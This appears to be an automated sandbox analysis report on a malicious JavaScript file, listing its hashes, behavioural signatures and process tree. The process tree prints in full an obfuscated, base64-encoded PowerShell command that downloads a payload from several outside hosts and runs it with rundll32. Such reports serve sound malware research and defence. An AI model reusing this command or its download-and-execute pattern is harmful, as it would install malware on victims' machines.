Analysis
-
max time kernel
135s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2023, 10:13
Static task
static1
Behavioral task
behavioral1
Sample
fanteaguePlumbe.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
fanteaguePlumbe.js
Resource
win10v2004-20230220-en
General
-
Target
fanteaguePlumbe.js
-
Size
264KB
-
MD5
92c0f80305adfa4554451bb5f1b59d91
-
SHA1
7ba95d838db09f25288ef725090f0e52a44e7e5e
-
SHA256
2032c8ab05b8e11c62316db5a893af0166e40057e8579cd2223dae401398c64d
-
SHA512
dea948bb49b39c4c6b83f71aed03137120d8ab85ab1c65a8cd97153292cd60ee8e7c1500c9818b9bfb4bb62d71b36559c41c071c808d4be02b898ed8120f2949
-
SSDEEP
3072:+rTOdz8tDS5QzBK3vV6Lfz4KnpmfdXf6PHdhBwRpkGmeiU:+rCdz8tDkQzBKfVqK+ORpjmed
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 22 1796 powershell.exe 29 1796 powershell.exe 38 1796 powershell.exe 39 1796 powershell.exe 41 1796 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1796 powershell.exe 1796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1796 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2576 wrote to memory of 4792 2576 wscript.exe 87 PID 2576 wrote to memory of 4792 2576 wscript.exe 87 PID 4792 wrote to memory of 1796 4792 wscript.exe 88 PID 4792 wrote to memory of 1796 4792 wscript.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fanteaguePlumbe.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\ProgramData\RecoverabilityHoarseness.js" perfectismIdiotise scrappet chauffersRippling dermatrophia2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABtAGEAcgBpAHQAYQBsAEgAbwB3AGkAdAB6AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGIAdwBCAHcAQQBIAEEAQQBhAFEAQgB1AEEARwBjAEEAYgBnAEIAbABBAEgATQBBAGMAdwBBAHUAQQBIAFEAQQBaAFEAQgBqAEEARwBnAEEAIgA7ACQAcwBoAG8AYwBrAHAAcgBvAG8AZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMABBAEcARQBBAGQAQQBCAGgAQQBIAFUAQQBjAEEAQgBoAEEARQBRAEEAYQBRAEIAbgBBAEcAawBBAGQAQQBCAGgAQQBHAHcAQQBhAFEAQgB1AEEAQwA0AEEAWgBnAEIAaABBAEcANABBAGMAdwBBAD0AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAEUAQQBjAGcAQgBoAEEARwAwAEEAWgBRAEIAMABBAEgASQBBAGEAUQBCADYAQQBHAFUAQQBaAEEAQQB1AEEASABBAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBBAD0AIgA7ACQAVQBuAGIAcgBhAGMAZQBsAGUAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBOAEEAQQB1AEEARABFAEEATQB3AEEAeABBAEMANABBAE0AUQBBAHcAQQBEAFkAQQBMAHcAQgB6AEEARgBjAEEAUgBRAEEAdgBBAEQAVQBBAFcAZwBBAD0ATQBYAFcAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGMAQQBMAGcAQQB4AEEARABrAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATAB3AEIAbQBBAEUAYwBBAGUAUQBBAHYAQQBIAEkAQQBNAFgAVwBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBEAFEAQQBjAFEAQgBDAEEARwBzAEEAUwBRAEIAMABBAEcAVQBBAFcAQQBBAD0ATQBYAFcAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgBxAEEARgBRAEEAUgBRAEIAQgBBAEgAWQBBAFQAQQBCAE8AQQBGAFEAQQBlAFEAQgBGAEEASABVAEEAYQBRAEEAPQBNAFgAVwBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAFUAQQBSAHcAQgBNAEEARwA4AEEAWgBRAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAG8AbABsAHkAYQBBAG4AdABoAHIAbwBwAG8AbABpAHQAaABpAGMAIABpAG4AIAAkAFUAbgBiAHIAYQBjAGUAbABlAHQAIAAtAHMAcABsAGkAdAAgACIATQBYAFcAUgAiACkAIAB7AHQAcgB5ACAAewAkAEMAbwBlAGQAaQB0AG8AcgBzAGgAaQBwACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHYAQQBHAE0AQQBjAGcAQgBoAEEARwBNAEEAYQBRAEIAbABBAEgATQBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEASABrAEEAIgA7ACQAYgBlAGIAaQB6AGEAdABpAG8AbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAG8AbABsAHkAYQBBAG4AdABoAHIAbwBwAG8AbABpAHQAaABpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABiAGUAYgBpAHoAYQB0AGkAbwBuACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFUAbgBoAHUAegB6AGEAZQBkAE4AaQB0AHIAaQBmAGkAZQBkAC4AcwBoAGUAYQB0AGgAZQByAFMAcABpAHIAbwBiAHIAYQBuAGMAaABpAGEAOwAkAEMAcgBvAHMAcwBlAHQAdABlAFIAZQBsAHUAYwB0AGkAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAGsAQQBOAHcAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE0AZwBBAHkAQQBEAFEAQQBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAVQBBAFkAUQBCAGkAQQBIAFUAQQBjAHcAQgBvAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZABnAEEAdQBBAEgAQQBBAGQAQQBBAD0AVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQA1AEEAQwA0AEEATgBBAEEAegBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQAyAEEARABZAEEAVgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABFAEEATgBRAEEAeABBAEMANABBAE0AZwBBADEAQQBEAEEAQQBMAGcAQQB4AEEARABNAEEATgBnAEEAPQAiADsAJABIAGEAZQBtAGEAdABvAGwAbwBnAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBFAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAHYAQQBIAEkAQQBjAHcAQQB1AEEARwAwAEEAYQBRAEIAaABBAEcAMABBAGEAUQBBAD0AcQBMAFcARABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAFUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAagBBAEcAOABBAGMAZwBCAHUAQQBIAE0AQQBUAGcAQgB2AEEARwA0AEEAWgBRAEIAdQBBAEcATQBBAGIAQQBCAHYAQQBIAE0AQQBkAFEAQgB5AEEARwBVAEEATABnAEIAdABBAEcAOABBAFkAZwBCAHAAQQBBAD0APQBxAEwAVwBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBNAHcAQQA9AHEATABXAEQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB5AEEARABnAEEATABnAEEAMQBBAEQAWQBBACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFUAbgBoAHUAegB6AGEAZQBkAE4AaQB0AHIAaQBmAGkAZQBkAC4AcwBoAGUAYQB0AGgAZQByAFMAcABpAHIAbwBiAHIAYQBuAGMAaABpAGEAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADcAOQAwADkAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEYAVQBBAGIAZwBCAG8AQQBIAFUAQQBlAGcAQgA2AEEARwBFAEEAWgBRAEIAawBBAEUANABBAGEAUQBCADAAQQBIAEkAQQBhAFEAQgBtAEEARwBrAEEAWgBRAEIAawBBAEMANABBAGMAdwBCAG8AQQBHAFUAQQBZAFEAQgAwAEEARwBnAEEAWgBRAEIAeQBBAEYATQBBAGMAQQBCAHAAQQBIAEkAQQBiAHcAQgBpAEEASABJAEEAWQBRAEIAdQBBAEcATQBBAGEAQQBCAHAAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEYAbABhAGMAaABlAHIAaQBlAE0AYQByAHQAaQBhAGwAaQBzAG0AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBOAHcAQQB1AEEARABFAEEATQBBAEEAMwBBAEMANABBAE4AZwBBAHcAQQBDADQAQQBNAFEAQQB5AEEARABJAEEAZgBCAG0AZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgAwAEEARwBnAEEAWgBRAEIAeQBBAEcARQBBAGMAQQBCAGwAQQBIAFUAQQBkAEEAQgBwAEEARwBNAEEAVQBnAEIAbABBAEcATQBBAGIAdwBCAHcAQQBIAGsAQQBjAGcAQgBwAEEARwBjAEEAYQBBAEIAMABBAEMANABBAFoAUQBCADQAQQBIAEEAQQBiAHcAQgB6AEEARwBVAEEAWgBBAEEAPQBmAEIAbQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHkAQQBHAFUAQQBaAHcAQgBoAEEASABJAEEAWgBBAEIAaABBAEcANABBAGQAQQBBAHUAQQBIAFkAQQBZAHcAQQA9ACIAOwAkAGMAeQBtAGUAbABlAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAHcAQgBzAEEARwBFAEEAZQBnAEIAbABBAEcAUQBBAFEAUQBCAGwAQQBIAEkAQQBhAFEAQgBtAEEARwBrAEEAWgBRAEIAawBBAEMANABBAFkAZwBCAGgAQQBIAEkAQQBZAHcAQgBsAEEARwB3AEEAYgB3AEIAdQBBAEcARQBBAHkAbgBMAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATQB3AEEAdQBBAEQASQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB6AEEARABnAEEATABnAEEAMgBBAEQAZwBBAHkAbgBMAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AQQBBADUAQQBDADQAQQBOAEEAQQA0AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AHkAbgBMAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADIAQQBEAGcAQQBMAGcAQQB5AEEARABNAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBADUAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD592c0f80305adfa4554451bb5f1b59d91
SHA17ba95d838db09f25288ef725090f0e52a44e7e5e
SHA2562032c8ab05b8e11c62316db5a893af0166e40057e8579cd2223dae401398c64d
SHA512dea948bb49b39c4c6b83f71aed03137120d8ab85ab1c65a8cd97153292cd60ee8e7c1500c9818b9bfb4bb62d71b36559c41c071c808d4be02b898ed8120f2949
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82